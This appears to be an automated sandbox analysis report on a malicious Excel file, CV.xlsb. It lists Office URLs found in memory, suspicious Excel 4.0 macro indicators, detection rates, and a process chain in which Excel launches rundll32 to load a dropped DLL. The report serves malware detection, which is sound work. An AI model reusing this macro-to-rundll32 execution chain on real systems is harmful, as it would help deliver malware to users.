Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cortana.ai
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://cr.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://devnull.onenote.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://directory.services.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.windows.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://graph.windows.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lifecycle.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.local
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://management.azure.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://messaging.office.com/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeapps.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerlift.acompli.net
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://settings.outlook.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://tasks.office.com
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: DA768304-9386-4C06-A952-5E2BC6B1C13F.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: CV.xlsbInitial sample: CALL
Source: CV.xlsbInitial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: CV.xlsbInitial sample: Sheet size: 777285
Source: CV.xlsbInitial sample: Sheet size: 777285
Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal76.expl.evad.winXLSB@3/5@0/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{938ACD9C-333E-4932-A3B0-F7ADCF65D160} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{938ACD9C-333E-4932-A3B0-F7ADCF65D160} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: CV.xlsbVirustotal: Detection: 9%
Source: CV.xlsbReversingLabs: Detection: 14%
Source: CV.xlsbVirustotal: Detection: 9%
Source: CV.xlsbReversingLabs: Detection: 14%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServerJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\gPOCoPl\xMtLxCb\WSGaRIW.dll,DllRegisterServerJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: rundll32.exe, 00000003.00000002.686713959.0000000004CA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
